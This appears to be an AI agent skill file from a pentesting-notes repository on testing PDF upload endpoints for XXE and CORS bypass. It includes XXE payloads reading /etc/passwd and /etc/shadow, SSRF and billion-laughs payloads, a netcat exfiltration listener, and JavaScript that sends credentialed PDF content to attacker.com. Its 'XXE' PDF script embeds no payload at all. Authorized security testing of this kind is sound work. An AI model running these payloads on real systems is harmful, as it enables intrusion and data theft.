Hacktricks-skills pdf-upload-xxe-cors-bypass
How to test PDF upload endpoints for XXE (XML External Entity) injection and CORS bypass vulnerabilities. Use this skill whenever you're pentesting file upload functionality, especially PDF uploads, or when investigating XXE injection vectors through file parsing. Make sure to use this skill when the user mentions PDF uploads, file upload vulnerabilities, XXE injection, CORS misconfigurations, or any file parsing security testing.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass/SKILL.MDPDF Upload - XXE and CORS Bypass Testing
This skill helps you identify and exploit XXE (XML External Entity) injection vulnerabilities and CORS bypass issues in PDF upload endpoints.
Understanding the Vulnerabilities
XXE in PDF Uploads
PDF files can contain XML-based content (especially in newer PDF versions). When a server parses uploaded PDFs without proper validation, it may process embedded XML entities, leading to:
- Local file disclosure - Reading files from the server filesystem
- SSRF - Making requests to internal services
- RCE - In some cases, remote code execution
- DoS - Billion laughs attack via entity expansion
CORS Bypass in PDF Uploads
CORS (Cross-Origin Resource Sharing) misconfigurations can allow:
- Cross-origin PDF access - Reading PDFs from other domains
- Credential theft - Accessing authenticated PDF content
- Data exfiltration - Extracting sensitive information from PDFs
Testing Methodology
Step 1: Identify PDF Upload Endpoints
Look for endpoints that accept PDF files:
# Find upload endpoints grep -r "upload" /path/to/app/ grep -r "\.pdf" /path/to/app/ # Check for file upload forms curl -I https://target.com/upload | grep -i "content-type"
Step 2: Test for XXE Injection
Create a Malicious PDF with XXE Payload
PDF files can embed XML content. Create a test PDF with embedded XXE:
# scripts/create-xxe-pdf.py import fitz # PyMuPDF def create_xxe_pdf(output_path): doc = fitz.open() page = doc.new_page() # Add text content text = "Test PDF for XXE" page.insert_text((72, 72), text) # Save the PDF doc.save(output_path) doc.close() print(f"Created: {output_path}") if __name__ == "__main__": create_xxe_pdf("xxe_test.pdf")
XXE Payloads to Test
Basic XXE Payload:
<!ENTITY xxe SYSTEM "file:///etc/passwd">%xxe;
File Read Payload:
<!ENTITY xxe SYSTEM "file:///etc/shadow">%xxe;
SSRF Payload:
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">%xxe;
Billion Laughs (DoS):
<!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;"> <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;"> <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;"> <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;"> <!ENTITY e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
Step 3: Test CORS Configuration
Check CORS Headers
# Test CORS headers on PDF endpoint curl -I -H "Origin: https://evil.com" https://target.com/api/pdf/upload # Check for overly permissive CORS curl -I -H "Origin: *" https://target.com/api/pdf/upload # Test with different origins curl -I -H "Origin: https://attacker.com" https://target.com/api/pdf/upload
Common CORS Misconfigurations
| Header | Vulnerable Value | Risk |
|---|---|---|
| | High - allows any origin |
| Reflected origin | Medium - reflects attacker's origin |
| with | Critical - allows credentials with any origin |
| | Medium - allows all HTTP methods |
Step 4: Exploitation Techniques
XXE Exploitation
-
File Disclosure:
# Upload malicious PDF and check response curl -X POST https://target.com/upload \ -F "file=@malicious.pdf" \ -v | grep -i "root:" # Check for /etc/passwd content -
SSRF:
# Monitor for internal requests # Check if internal services are accessible curl -X POST https://target.com/upload \ -F "file=@ssrf-pdf.pdf" -
Out-of-Band Data Exfiltration:
# Set up listener nc -lvnp 4444 # Upload PDF with XXE pointing to your server curl -X POST https://target.com/upload \ -F "file=@ooe-pdf.pdf"
CORS Bypass Exploitation
-
Cross-Origin PDF Access:
<!-- scripts/cors-test.html --> <script> fetch('https://target.com/api/pdf/protected.pdf', { method: 'GET', mode: 'cors', credentials: 'include' }) .then(response => response.text()) .then(data => { // Send to attacker server fetch('https://attacker.com/collect', { method: 'POST', body: data }); }); </script> -
Credential Theft:
// If CORS allows credentials, authenticated requests work fetch('https://target.com/api/pdf/user-data.pdf', { credentials: 'include' // Sends cookies });
Step 5: Verification and Reporting
XXE Verification Checklist
- Server processes XML entities in PDF content
- File read payloads return expected content
- SSRF payloads reach internal services
- DoS payloads cause resource exhaustion
- Error messages reveal parsing details
CORS Verification Checklist
-
is notAccess-Control-Allow-Origin* - Origin is not reflected in response
- Credentials are not allowed with wildcard origin
- Sensitive PDFs are not accessible cross-origin
- CORS preflight requests are properly validated
Common Tools
PDF Manipulation
# Install PyMuPDF pip install pymupdf # Create test PDFs python scripts/create-xxe-pdf.py # Inspect PDF structure pdfinfo target.pdf
CORS Testing
# Use curl for manual testing curl -I -H "Origin: https://evil.com" https://target.com/api/pdf # Use browser DevTools # Check Network tab for CORS headers
Automated Scanning
# Check for XXE in file upload nuclei -u https://target.com/upload -t xxe.yaml # Check CORS configuration nuclei -u https://target.com/api/pdf -t cors.yaml
Mitigation Recommendations
For XXE
- Disable XML entity processing in PDF parsers
- Validate file content - ensure uploaded files are actually PDFs
- Use allowlists for permitted file types
- Sanitize input before processing
- Run parsers in sandboxed environments
For CORS
- Set specific origins instead of
* - Don't reflect origin in response headers
- Disable credentials when using wildcard origin
- Validate preflight requests
- Use SameSite cookies for additional protection
References
- Multiple PDF Vulnerabilities - insert-script.blogspot.com
- OWASP XXE Prevention Cheat Sheet
- OWASP CORS Cheat Sheet
- PDF File Format Specification
Example Workflow
# 1. Create test PDF with XXE payload python scripts/create-xxe-pdf.py # 2. Upload and test for XXE curl -X POST https://target.com/upload \ -F "file=@xxe_test.pdf" \ -v # 3. Check CORS headers curl -I -H "Origin: https://evil.com" \ https://target.com/api/pdf/upload # 4. Analyze response for vulnerabilities # 5. Document findings and recommend fixes
Important Notes
- Always get authorization before testing file upload vulnerabilities
- Test in isolated environments to avoid impacting production
- Document all findings with evidence and reproduction steps
- Follow responsible disclosure when reporting vulnerabilities
- Consider business impact when prioritizing remediation